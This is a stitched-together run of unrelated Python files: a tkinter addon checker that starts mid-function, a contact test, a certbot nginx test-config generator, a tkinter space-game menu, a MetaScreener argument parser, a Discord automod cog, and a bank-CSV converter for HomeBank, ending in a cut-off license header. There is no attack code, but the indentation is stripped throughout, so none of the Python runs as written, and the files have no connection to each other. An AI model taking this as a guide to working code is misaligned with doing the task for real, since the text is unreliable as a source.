messagebox.showerror("Not Compatible","The two packs are not compatible because they both modify the following game features: \n{}".format(printInt))
else:
messagebox.showinfo("Compatible","The two packs are likely compatible")
else:
messagebox.showerror("No Base Pack", "You must first select a base pack to check compatiblity")
root = Tk()
root.title("Addon Checker")
core_pack=Label(root, text="Core Pack")
add_ins=Label(root, text="Common Additions (will be added to the core pack):")
death_counter_check = IntVar()
ops_counter_check = IntVar()
clear_counter_check = IntVar()
packPath = StringVar()
death_check = Checkbutton(root, text="Death Counter", variable=death_counter_check, onvalue=1, offvalue=0)
ops_check = Checkbutton(root, text="One Player Sleep", variable=ops_counter_check, onvalue=1, offvalue=0)
clear_check = Checkbutton(root, text="One player sleep with clear weather", variable=clear_counter_check, onvalue=1, offvalue=0)
browsButton = Button(root, text="Browse", command=browsepack)
packButton = Button(root, text="Merge in Packs", command=make_pack_from_gui)
Cross_check = Button(root, text="Cross Check a Pack", command=crossCheckPacksGui)
path_entry = Entry(root, textvariable=packPath, width=30)
r=0
core_pack.grid(row=r, column=0,columnspan=2)
r+=1
path_entry.grid(row=r, column=0)
browsButton.grid(row=r, column=1)
r+=1
add_ins.grid(row=r, column=0,columnspan=2)
r+=1
death_check.grid(row=r, column=0,columnspan=2)
r+=1
ops_check.grid(row=r, column=0,columnspan=2)
r+=1
clear_check.grid(row=r, column=0,columnspan=2)
r+=1
Cross_check.grid(row=r, column=0)
packButton.grid(row=r, column=1)
root.mainloop()
root.quit()
__author__ = 'Sergei'
from model.contact import Contact
from random import randrange
def test_del_contact(app):
if app.contact.count() == 0:
app.contact.create_c(Contact(first_n= "first",mid_n= "middle",last_n= "last",nick_n= "kuk",company= "adda",address= "575 oiweojdckjgsd,russia",home_ph= "12134519827",
cell_ph= "120092340980",email= "first.lastmiddle.@adda.com"))
old_contact = app.contact.get_contact_list()
index = randrange(len(old_contact))
app.contact.contact_delete_by_index(index)
new_contact = app.contact.get_contact_list()
assert len(old_contact) - 1 == len(new_contact)
old_contact[index:index+1] = []
assert old_contact == new_contact
# -*- coding: utf-8 -*-
"""General purpose nginx test configuration generator."""
import getpass
from typing import Optional
import pkg_resources
def construct_nginx_config(nginx_root: str, nginx_webroot: str, http_port: int, https_port: int,
other_port: int, default_server: bool, key_path: Optional[str] = None,
cert_path: Optional[str] = None, wtf_prefix: str = 'le') -> str:
"""
This method returns a full nginx configuration suitable for integration tests.
:param str nginx_root: nginx root configuration path
:param str nginx_webroot: nginx webroot path
:param int http_port: HTTP port to listen on
:param int https_port: HTTPS port to listen on
:param int other_port: other HTTP port to listen on
:param bool default_server: True to set a default server in nginx config, False otherwise
    :param str key_path: the path to an SSL key
    :param str cert_path: the path to an SSL certificate
:param str wtf_prefix: the prefix to use in all domains handled by this nginx config
:return: a string containing the full nginx configuration
:rtype: str
"""
key_path = key_path if key_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/key.pem')
cert_path = cert_path if cert_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/cert.pem')
return '''\
# This error log will be written regardless of server scope error_log
# definitions, so we have to set this here in the main scope.
#
# Even doing this, Nginx will still try to create the default error file, and
# log a non-fatal error when it fails. After that things will work, however.
error_log {nginx_root}/error.log;
# The pidfile will be written to /var/run unless this is set.
pid {nginx_root}/nginx.pid;
user {user};
worker_processes 1;
events {{
worker_connections 1024;
}}
# “This comment contains valid Unicode”.
http {{
# Set an array of temp, cache and log file options that will otherwise default to
# restricted locations accessible only to root.
client_body_temp_path {nginx_root}/client_body;
fastcgi_temp_path {nginx_root}/fastcgi_temp;
proxy_temp_path {nginx_root}/proxy_temp;
#scgi_temp_path {nginx_root}/scgi_temp;
#uwsgi_temp_path {nginx_root}/uwsgi_temp;
access_log {nginx_root}/error.log;
# This should be turned off in a Virtualbox VM, as it can cause some
# interesting issues with data corruption in delivered files.
sendfile off;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
#include /etc/nginx/mime.types;
index index.html index.htm index.php;
log_format main '$remote_addr - $remote_user [$time_local] $status '
'"$request" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
default_type application/octet-stream;
server {{
# IPv4.
listen {http_port} {default_server};
# IPv6.
listen [::]:{http_port} {default_server};
server_name nginx.{wtf_prefix}.wtf nginx2.{wtf_prefix}.wtf;
root {nginx_webroot};
location / {{
# First attempt to serve request as file, then as directory, then fall
# back to index.html.
try_files $uri $uri/ /index.html;
}}
}}
server {{
listen {http_port};
listen [::]:{http_port};
server_name nginx3.{wtf_prefix}.wtf;
root {nginx_webroot};
location /.well-known/ {{
return 404;
}}
return 301 https://$host$request_uri;
}}
server {{
listen {other_port};
listen [::]:{other_port};
server_name nginx4.{wtf_prefix}.wtf nginx5.{wtf_prefix}.wtf;
}}
server {{
listen {http_port};
listen [::]:{http_port};
listen {https_port} ssl;
listen [::]:{https_port} ssl;
if ($scheme != "https") {{
return 301 https://$host$request_uri;
}}
server_name nginx6.{wtf_prefix}.wtf nginx7.{wtf_prefix}.wtf;
ssl_certificate {cert_path};
ssl_certificate_key {key_path};
}}
}}
'''.format(nginx_root=nginx_root, nginx_webroot=nginx_webroot, user=getpass.getuser(),
http_port=http_port, https_port=https_port, other_port=other_port,
default_server='default_server' if default_server else '', wtf_prefix=wtf_prefix,
key_path=key_path, cert_path=cert_path)
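# Illustrative, uncalled sketch (paths and ports are made up): render a test
# configuration and write it to disk for a local nginx instance.
def _demo_construct_nginx_config():
    conf = construct_nginx_config(
        nginx_root="/tmp/nginx-test", nginx_webroot="/tmp/nginx-test/webroot",
        http_port=8080, https_port=8443, other_port=8081, default_server=True)
    with open("/tmp/nginx-test/nginx.conf", "w") as conf_file:
        conf_file.write(conf)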
from tkinter import *
from tkinter import font
from tkinter import ttk
from importlib import reload
game_loadonce = False
def play():
global game
global menuApp, game_loadonce
menuApp.save_scores("leaderboard.txt")
menuApp.root.destroy()
if game_loadonce == False:
import game
game_loadonce = True
else:
reload(game)
menuApp = _menuApp()
menuApp.fnh_ttl.configure(text="Score: "+str(game.score))
menuApp.getname1()
class _menuApp():
def sortf(self, scr):
i2 = 0
for i in range(len(scr), 0, -1):
if scr[i:i+2] == '- ':
i2 = i
break
i2 += 2
return -int(scr[i2:])
def load_scores(self, fname):
try:
file = open(fname, mode='r')
except FileNotFoundError:
file = open(fname, 'a')
file.close()
return
for line in file.readlines():
line = line.strip()
self.scores.append(line)
self.scores.sort(key=self.sortf)
file.close()
def save_scores(self, fname):
file = open(fname, mode='w')
for line in self.scores:
file.write(line+'\n')
file.close()
def update_scores(self, name=None, score=None):
if name != None and score != None:
msg = name+' - '+str(score)
self.scores.append(msg)
self.scores.sort(key=self.sortf)
self.scr_lst_v.set(value=self.scores)
self.save_scores("leaderboard.txt")
def quit(self):
self.destroyed = True
self.root.quit()
def leaderboard(self, prev_f):
prev_f.place_forget()
self.main.place_forget()
self.ldr_brd.place(x=0, y=0)
def mainmenu(self, prev_f):
prev_f.place_forget()
self.main.place(x=0, y=0)
def getname1(self):
self.main.place_forget()
self.finish.place(x=0, y=0)
def getname2(self):
self.finish.place_forget()
self.main.place(x=0, y=0)
if menuApp.txtname.get() == '':
menuApp.txtname.set('Anonymous')
menuApp.update_scores(menuApp.txtname.get(), game.score)
def __init__(self):
self.rescr = (512, 512)
self.root = Tk()
self.root.title("SPACE ATTXK")
self.root.geometry(str(self.rescr[0]) + 'x' + str(self.rescr[1]))
self.root.resizable(False, False)
self.font1 = font.Font(family='Arial', size=24)
self.font2 = font.Font(family='Arial', size=12)
self.s = ttk.Style()
self.s.configure('TButton', font=self.font2)
self.main = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.main.columnconfigure(0, weight=1)
self.main.columnconfigure(3, weight=1)
self.main.rowconfigure(0, weight=1)
self.main.rowconfigure(6, weight=1)
self.main.grid_propagate(0)
self.main.place(x=0, y=0)
self.title = ttk.Label(
self.main, text="SPACE ATTXCK", font=self.font1, padding=32)
self.title.grid(row=1, column=0, columnspan=4)
self.strt_btn = ttk.Button(self.main, text="Play", command=play)
self.strt_btn.grid(row=2, column=2, sticky=S+E+W)
self.ldr_btn = ttk.Button(
self.main, text="Leaderboard", command=lambda: self.leaderboard(self.main))
self.ldr_btn.grid(row=3, column=2, sticky=N+E+S+W)
self.settings = ttk.Button(
self.main, text="Exit", command=lambda: exit())
self.settings.grid(row=4, column=2, sticky=N+E+W)
ctl_txt = "Controls:\nJump - Space\n Fire - Enter\nEscape - Pause Game"
self.controls = ttk.Label(
self.main, text=ctl_txt, font=self.font2, justify=CENTER, padding=32)
self.controls.grid(row=5, column=2, sticky=N+E+W)
self.scores = []
self.scr_lst_v = StringVar(value=self.scores)
self.load_scores("leaderboard.txt")
self.update_scores()
self.ldr_brd = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.ldr_brd.columnconfigure(0, weight=1)
self.ldr_brd.columnconfigure(3, weight=1)
# self.ldr_brd.rowconfigure(0,weight=1)
self.ldr_brd.grid_propagate(0)
self.ldr_ttl = ttk.Label(
self.ldr_brd, text="Leaderboard", font=self.font1, padding=32, justify=CENTER)
self.ldr_ttl.grid(row=1, column=2)
self.ldr_lst = Listbox(self.ldr_brd, listvariable=self.scr_lst_v,
height=10, selectmode='browse', font=self.font2)
self.ldr_lst.grid(row=2, column=2, padx=16, pady=16)
self.ldr_exit = ttk.Button(
self.ldr_brd, text="Main Menu", command=lambda: self.mainmenu(self.ldr_brd))
self.ldr_exit.grid(row=3, column=2)
self.finish = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.finish.rowconfigure(0, weight=1)
self.finish.rowconfigure(5, weight=1)
self.finish.columnconfigure(1, weight=1)
self.finish.columnconfigure(3, weight=3)
self.finish.grid_propagate(0)
self.txtname = StringVar()
self.fnh_ttl = ttk.Label(self.finish, text="",
font=self.font1, justify=CENTER)
self.fnh_ttl.grid(row=1, column=2, padx=16, pady=16)
self.fnh_lbl1 = ttk.Label(
self.finish, text="Enter name:", font=self.font2, justify=CENTER)
self.fnh_lbl1.grid(row=3, column=1, padx=16)
self.fnh_txtin = ttk.Entry(
self.finish, font=self.font2, justify=CENTER, textvariable=self.txtname)
self.fnh_txtin.grid(row=3, column=2)
self.fnh_btn = ttk.Button(
self.finish, text="OK", command=self.getname2)
self.fnh_btn.grid(row=4, column=2, padx=16, pady=16)
menuApp = _menuApp()
menuApp.root.mainloop()
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import getopt
import os
import sys
import re
from .debug import Debug
from .debug import BColors
from subprocess import Popen, PIPE
from multiprocessing import cpu_count
class InputParams(object):
def __init__(self, cfg, argv):
self.PROG_OPT_RE = re.compile(r'^([A-Z\d]+)[_-](?:([A-Z\d]+)[_-])?')
self.cfg = cfg
self.argv = argv
self.TAG = "InputPArams"
self.color = BColors.GREEN
self.get_input_params()
def get_input_params(self):
if len(self.argv) == 1:
self.cfg.print_format_help("Mandatory options:", "")
self.cfg.print_format_help("-i", "result folder genereted by MetaScreener")
self.cfg.print_format_help("-p", "Original target")
self.cfg.print_format_help("--pdb", "Original target in pdb format")
self.cfg.print_format_help("-l", "Original query")
print("")
self.cfg.print_format_help("Optional options:", "")
self.cfg.print_format_help("--cores", "Maximum number of cores; Use 0 for autodetect; Default: 1")
self.cfg.print_format_help("--profile", "webBD STANDARD_BD STANDARD_VS")
self.cfg.print_format_help("--prog", "Software")
self.cfg.print_format_help("--opt", "opt")
self.cfg.print_format_help("-c", "cut-off of energies; Default: 0")
self.cfg.print_format_help("-z", "Clustering only for BD; Deafult: y")
self.cfg.print_format_help("-s", "Generate poseview; Deafult: y")
self.cfg.print_format_help("-t", "Generate plip interactions; Deafult: y")
self.cfg.print_format_help("-f", "If folder exits don't overwrite; Deafult: y")
self.cfg.print_format_help("-a", "Generate pymol sessions with plip;"
"Deafult: n")
self.cfg.print_format_help("--rb", "Number of files saved as bestScore in VS. Default(50)")
self.cfg.print_format_help("--rf", "Number of files saved in VS. Default (500)")
self.cfg.print_format_help("-b", "Chain of residues split by ':', type cad_res_num, "
" For example A_TYR_385:A_VAL_434:A_VAL_5")
self.cfg.print_format_help("-e", "ONLY BD; calcula la distancia entre el centro del ligando original y el"
" centro del ligando "
"de docking; Deafult: n")
self.cfg.print_format_help("-d", "Debug level; Deafult: 0 (off)")
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y -z clusterizado y"
% sys.argv[0] + "\n")
exit()
print("Using {} core{} for procesing results.".format(self.cfg.cores, 's' if self.cfg.cores > 1 else ''))
# Read command line args
myopts, args = getopt.getopt(self.argv[1:], "i:p:l:c:s:z:t:d:k:f:a:b:r:e:",
["cores=", "prog=", "opt=", "profile=", "flex", "rb=", "rf=", "pdb="])
for o, a in myopts:
if o == '--profile':
self.cfg.use_profile = a.upper()
if self.cfg.use_profile:
self.cfg.set_profile_cfg(self.cfg.use_profile)
for o, a in myopts:
if o == '-i':
self.cfg.file_input = os.path.realpath(a if a.endswith('/') else "{}/".format(a))
elif o == '-p':
self.cfg.file_target = a
elif o == '--pdb':
self.cfg.file_target_pdb = a
elif o == '-c':
self.cfg.engCorte = float(a)
elif o == '-l':
self.cfg.file_query = a
elif o == '-s':
self.cfg.poseview = a
elif o == '-z':
self.cfg.clusterizado = a
elif o == '-d':
self.cfg.mode_debug = a
elif o == '-a':
self.cfg.plip = a
elif o == '-f':
self.cfg.createFolder = a
elif o == '-e':
self.cfg.distanceLigs = a
elif o == '-b':
aux = a.split(":")
for i in aux:
self.cfg.resnPoseviewDetct.append(i)
elif o == '--flex':
self.cfg.flexible = True
elif o == '--cores':
self.cfg.cores = int(a)
max_cores = cpu_count()
if self.cfg.cores == 0 or self.cfg.cores > max_cores:
self.cfg.cores = max_cores
elif self.cfg.cores < 0:
self.cfg.cores = 1
elif o == '--profile':
self.cfg.use_profile = a.upper()
elif o == '--prog':
self.cfg.programa = a.upper()
elif o == '--opt':
if not self.cfg.use_profile:
self.cfg.opcion = a.upper()
elif o == '--rb':
self.cfg.resultados_best_score = int(a)
elif o == '--rf':
self.cfg.resultados_ficheros = int(a)
else:
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y "
"-z clusterizado y -t inteacciones y -d debug [0-10]" % sys.argv[0] + "\n")
exit()
self.cfg.debug = Debug(self.cfg.mode_debug)
self.cfg.file_target = os.path.realpath(self.cfg.file_target)
if self.cfg.file_target_pdb:
self.cfg.file_target_pdb = os.path.realpath(self.cfg.file_target_pdb)
self.cfg.file_query = os.path.realpath(self.cfg.file_query)
self.cfg.file_input = os.path.realpath(self.cfg.file_input)
# Get compounds names and input path
self.cfg.extract_names()
if not self.cfg.file_target or not os.path.exists(self.cfg.file_target):
print("Target(s) not indicated(s), aborting.")
exit()
elif not self.cfg.file_query or not os.path.exists(self.cfg.file_query):
print("Query(s) not found, aborting.")
exit()
elif not self.cfg.file_input or not os.path.exists(self.cfg.file_input):
print("Path of docking results not found, aborting.")
exit()
self.cfg.print_format("Input files:", "", "")
self.cfg.print_format("", "Query: ", self.cfg.file_target)
self.cfg.print_format("", "Ligands: ", self.cfg.file_query)
self.cfg.print_format("", "Directory MetaScreener: ", self.cfg.file_input + "/")
#
# Test folders
#
self.cfg.SHUTTLEMOL_DIRS = self.cfg.perfiles.get_folders()
self.cfg.OUTPUT_DIRS = self.cfg.perfiles.get_out_folders()
self.cfg.OUTPUT_GRAPHS = self.cfg.perfiles.get_files_out()
self.cfg.ext_query = os.path.splitext(self.cfg.file_query)[1].strip()
self.cfg.ext_target = os.path.splitext(self.cfg.file_target)[1].strip()
comando = ("find " + self.cfg.file_input + "/" + self.cfg.SHUTTLEMOL_DIRS[
'folderMolec'] + "/ ")
aux = self.cfg.execute(self.TAG, comando)
aux = aux.split("\n")
if os.path.isdir(aux[0]):
del aux[0]
self.cfg.extLigand = str(os.path.splitext(aux[0])[1]).strip()
self.cfg.print_format("", "Ext Prot: ", self.cfg.ext_target)
self.cfg.print_format("", "Ext Lig: ", self.cfg.ext_query)
if self.cfg.mode_debug:
debug = Debug(self.cfg.mode_debug)
for i in self.cfg.SHUTTLEMOL_DIRS:
debug.show(self.TAG + " metascreener Dirs: " + i, self.color)
for i in self.cfg.OUTPUT_DIRS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_DIRS[i], self.color)
for i in self.cfg.OUTPUT_GRAPHS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_GRAPHS[i]['outPut'], self.color)
if not self.cfg.programa or not self.cfg.opcion:
match = self.PROG_OPT_RE.match(self.cfg.nameEntrada)
if match and len(match.group()) > 1:
self.cfg.programa = match.group(2).strip()
self.cfg.opcion = match.group(1).strip()
else:
print("The program or the option could not be determined, aborting ")
exit()
self.cfg.print_format("\nTest data:", "", "")
self.cfg.print_format("", "Software: ", self.cfg.programa)
self.cfg.print_format("", "Technique: ", self.cfg.opcion)
self.cfg.print_format("", "Molecules:", str(len(aux)) + "\n")
"""Test."""
import unittest
class TestX(unittest.TestCase):
"""Tests."""
def test_f(self):
"""Test."""
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
import discord
from redbot.core import Config, commands, checks
class Automod(commands.Cog):
"""Automoderation commands"""
def __init__(self):
self.config = Config.get_conf(self, identifier=1234567890)
        # Config defaults must be mappings; each custom group stores a single list.
        self.config.init_custom("ChannelsWatched", 1)
        self.config.register_custom("ChannelsWatched", watching=[])
        self.config.init_custom("BlacklistedWords", 1)
        self.config.register_custom("BlacklistedWords", blacklisted_words=[])
@commands.group(name='automod')
async def automod(self, ctx):
pass
@automod.command(name='watch')
@commands.admin()
    async def watch(self, ctx, channel: discord.TextChannel):
        async with self.config.custom("ChannelsWatched").watching() as watching:
            watching.append(channel.id)
        await ctx.send(f'Watching {channel.name}')
@automod.command(name='unwatch')
@commands.admin()
    async def unwatch(self, ctx, channel: discord.TextChannel):
        async with self.config.custom("ChannelsWatched").watching() as watching:
            if channel.id in watching:
                watching.remove(channel.id)
        await ctx.send(f'Stopped watching {channel.name}')
@automod.command(name='block')
@commands.admin()
    async def block(self, ctx, word: str):
        async with self.config.custom("BlacklistedWords").blacklisted_words() as blacklisted:
            blacklisted.append(word)
        await ctx.send(f'Blocked `{word}`')
@automod.command(name='unblock')
@commands.admin()
    async def unblock(self, ctx, word: str):
        async with self.config.custom("BlacklistedWords").blacklisted_words() as blacklisted:
            if word in blacklisted:
                blacklisted.remove(word)
        await ctx.send(f'Unblocked `{word}`')
@automod.command(name='listblocked')
async def listblocked(self, ctx):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
await ctx.send(f'```{str(blacklisted)}```')
@commands.Cog.listener()
async def on_message(self, message):
watching_channels = await self.config.custom("ChannelsWatched").watching()
blacklisted_words = await self.config.custom("BlacklistedWords").blacklisted_words()
        if message.channel.id not in watching_channels:
            return
        for word in blacklisted_words:
            if word in message.content:
                await message.delete()
                break
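# Hypothetical loader sketch, not part of the original cog: Red-DiscordBot looks for a
# setup entry point (normally in the package's __init__.py). Whether setup is plain or
# async depends on the Red/discord.py version; the async form is assumed here.
async def setup(bot):
    await bot.add_cog(Automod())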
#! /user/bin/env python3
import argparse
import xlrd
from datetime import datetime
import pandas as pd
import os
import shutil
import configparser
config = configparser.ConfigParser()
config.read("config.ini")
unixFilesPath = os.getcwd() + config["FilePaths"]["unixFilesPath"]
unixConvertedPath = os.getcwd() + config["FilePaths"]["unixConvertedPath"]
windowsFilesPath = os.getcwd() + config["FilePaths"]["windowsFilesPath"]
windowsConvertedPath = os.getcwd() + config["FilePaths"]["windowsConvertedPath"]
user = config["User"]["username"]
homeBankCols = config["HomeBank"]["homeBankCols"].split(sep=",")
amexHeaders = config["CSVHeaders"]["amexHeaders"].split(sep=",")
boaCAHeaders = config["CSVHeaders"]["boaCAHeaders"].split(sep=",")
boaCCHeaders = config["CSVHeaders"]["boaCCHeaders"].split(sep=",")
earnestHeaders = config["CSVHeaders"]["earnestHeaders"].split(sep=",")
vanguardRothHeaders = config["CSVHeaders"]["vanguardRothHeaders"].split(sep=",")
vanguard401KHeaders = config["CSVHeaders"]["vanguard401KHeaders"].split(sep=",")
venmoHeaders = config["CSVHeaders"]["venmoHeaders"].split(sep=",")
paypalHeaders = config["CSVHeaders"]["paypalHeaders"].split(sep=",")
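# Illustrative config.ini layout this script expects (all values below are made-up
# placeholders; the CSVHeaders lists must match the exact column names each
# institution exports, and homeBankCols must match the HomeBank import format):
#
#   [FilePaths]
#   unixFilesPath = /files
#   unixConvertedPath = /convertedfiles
#   windowsFilesPath = \files
#   windowsConvertedPath = \convertedfiles
#
#   [User]
#   username = Your Name
#
#   [HomeBank]
#   homeBankCols = date,payment,info,payee,memo,amount,category,tags
#
#   [CSVHeaders]
#   amexHeaders = Date,Description,Amount
#   (one entry per converter: boaCAHeaders, boaCCHeaders, earnestHeaders,
#    vanguardRothHeaders, vanguard401KHeaders, venmoHeaders, paypalHeaders)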
def amexCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == amexHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
        if pd.notna(row["Amount"]):
data.append([row["Date"], None, None, row["Description"], None,
-1*row["Amount"],
None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/amexHomeBank.csv", index=False, sep=";")
def boaCAConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=5)
if all(inputDataDict.columns == boaCAHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Date"], None, None, row["Description"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCAHomeBank.csv", index=False, sep=";")
def boaCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == boaCCHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Posted Date"], None, row["Reference Number"], row["Payee"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCCHomeBank.csv", index=False, sep=";")
def earnestConversion(filename):
inputDataDict = pd.read_html(io=filename)[0]
try:
if all(inputDataDict.columns == earnestHeaders):
inputDataDict = pd.read_html(io=filename)[0].to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
# Just the loan
data.append([row["Date"], None, None, user, None,
row["Total"][2:],
"Loan Payment", None])
# Just the interest
data.append([row["Date"], None, None, "Earnest", None,
"-" + row["Interest"][2:],
"Loan Interest", None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/earnestHomeBank.csv", index=False, sep=";")
def vanguardRothConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=3)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguardRothHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguardRothLogic(row["Transaction Type"]):
data.append([row["Settlement Date"], 0, row["Transaction Description"], "Vanguard",
None, row["Principal Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguardRothHomeBank.csv", index=False, sep=";")
def vanguardRothLogic(rowType):
if rowType == "Dividend":
return True
elif rowType == "Contribution":
return True
elif rowType == "Capital gain (LT)":
return True
elif rowType == "Capital gain (ST)":
return True
else:
return False
def vanguard401KConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=16)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguard401KHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguard401KLogic(row["Transaction Description"]):
data.append([
row["Run Date"], None, row["Transaction Description"],
"Vanguard", None, row["Dollar Amount"], None, row["Investment Name"]
])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguard401KHomeBank.csv", index=False, sep=";")
def vanguard401KLogic(rowType):
if rowType == "Plan Contribution":
return True
elif rowType == "Dividends on Equity Investments":
return True
else:
return False
def venmoConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=0)
inputDataDict["Datetime"] = pd.to_datetime(inputDataDict["Datetime"],format="%Y-%m-%dT%H:%M:%S")
if all(inputDataDict.columns == venmoHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount (total)"]):
data.append([
row["Datetime"].strftime("%m/%d/%Y"),
None, row["Note"],
venmoLogic(row),
"Venmo " + row["Type"],
row["Amount (total)"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/venmoHomeBank.csv", index=False, sep=";")
def paypalConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == paypalHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount"]):
data.append([
row["Date"],
None, row["Type"],
row["Name"] if pd.notnull(
row["Name"]) else paypalLogic(row["Type"]),
None, row["Amount"], None, None])
if len(data) == 0:
raise Exception()
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/paypalHomeBank.csv", index=False, sep=";")
def paypalLogic(type_name):
if type_name == "General Credit Card Deposit":
return "Paypal"
else:
return None
def init():
try:
os.mkdir("files")
os.mkdir("convertedfiles")
print("Init success")
except:
print("Init failed")
def runAll():
print("Running all possible conversions")
cwd = ""
try:
if os.name == "nt":
fileList = os.listdir(windowsFilesPath)
cwd = windowsFilesPath + "\\"
else:
fileList = os.listdir(unixFilesPath)
cwd = unixFilesPath + "/"
except:
raise Exception
for file in fileList:
filePath = cwd + file
try:
amexCCConversion(filePath)
print(file + " is amexCC")
except:
print(file + " is not amexCC")
try:
boaCAConversion(filePath)
print(file + " is boaCA")
except:
print(file + " is not boaCA")
try:
boaCCConversion(filePath)
print(file + " is boaCC")
except:
print(file + " is not boaCC")
try:
earnestConversion(filePath)
print(file + " is earnest")
except:
print(file + " is not earnest")
try:
vanguardRothConversion(filePath)
print(file + " is vanguardRoth")
except:
print(file + " is not vanguardRoth")
try:
vanguard401KConversion(filePath)
print(file + " is vanguard401k")
except:
print(file + " is not vanguard401k")
try:
venmoConversion(filePath)
print(file + " is venmo")
except:
print(file + " is not venmo")
try:
paypalConversion(filePath)
print(file + " is paypal")
except:
print(file + " is not paypal")
def clean():
try:
if os.name == "nt":
shutil.rmtree(windowsFilesPath)
shutil.rmtree(windowsConvertedPath)
else:
shutil.rmtree(unixFilesPath)
shutil.rmtree(unixConvertedPath)
print("Directories have been removed")
except:
print("Directories were not cleaned")
def venmoLogic(row):
if row["Type"] == "Charge":
return row["To"]
elif row["Type"] == "Standard Transfer":
return user
elif row["Type"] == "Payment":
return row["From"]
else:
return None
def main():
parser1 = argparse.ArgumentParser(add_help=False,
description="Convert data files from online banking sites to Homebank compatible CSV formats. Default is to run all")
parser1.add_argument("--clean", action="store_true",
help="deletes the \'convertedfiles\' and \'files\' directories and its contents")
parser1.add_argument("--init", action="store_true",
help="initialize the directories by creating the \'convertedfiles\' and \'files\' directories ")
parser2 = argparse.ArgumentParser(parents=[parser1])
group = parser2.add_mutually_exclusive_group()
group.add_argument("--amex", nargs=1,
help="convert an American Express credit card account CSV file",)
group.add_argument("--boaCA", nargs=1,
help="convert a Bank of America checking account CSV file")
group.add_argument("--boaCC", nargs=1,
help="convert a Bank of America credit card CSV file")
group.add_argument("--earnest", nargs=1,
help="convert an Earnest xlsx file")
group.add_argument("--venmo", nargs=1,
help="convert a Venmo csv file")
group.add_argument("--vRoth", nargs=1,
help="convert a Vanguard Roth csv file")
group.add_argument("--v401k", nargs=1,
help="convert a Vanguard 401K csv file")
group.add_argument("--paypal", nargs=1,
help="convert a Paypal csv file")
args = parser2.parse_args()
if args.clean:
clean()
elif args.init:
init()
elif args.amex:
amexCCConversion(args.amex[0])
print("AMEX file converted. Output file: amexHomeBank.csv")
elif args.boaCA:
boaCAConversion(args.boaCA[0])
print("BOA CA file converted. Output file: boaHomeBank.csv")
elif args.boaCC:
boaCCConversion(args.boaCC[0])
print("BOA CC file converted. Output file: boaHomeBank.csv")
elif args.earnest:
earnestConversion(args.earnest[0])
print("Earnest file converted. Output file: earnestHomeBank.csv")
elif args.venmo:
venmoConversion(args.venmo[0])
print("Venmo file converted. Output file: venmoHomeBank.csv")
elif args.vRoth:
vanguardRothConversion(args.vRoth[0])
print("Vanguard Roth file converted. Output file: vanguardRothHomeBank.csv")
elif args.v401k:
vanguard401KConversion(args.v401k[0])
print("Vanguard 401k file converted. Output file: vanguard401kHomeBank.csv")
elif args.paypal:
paypalConversion(args.paypal[0])
print("Paypal file converted. Output file: paypalHomeBank.csv")
else:
runAll()
if __name__ == "__main__":
main()
#-*- coding:utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
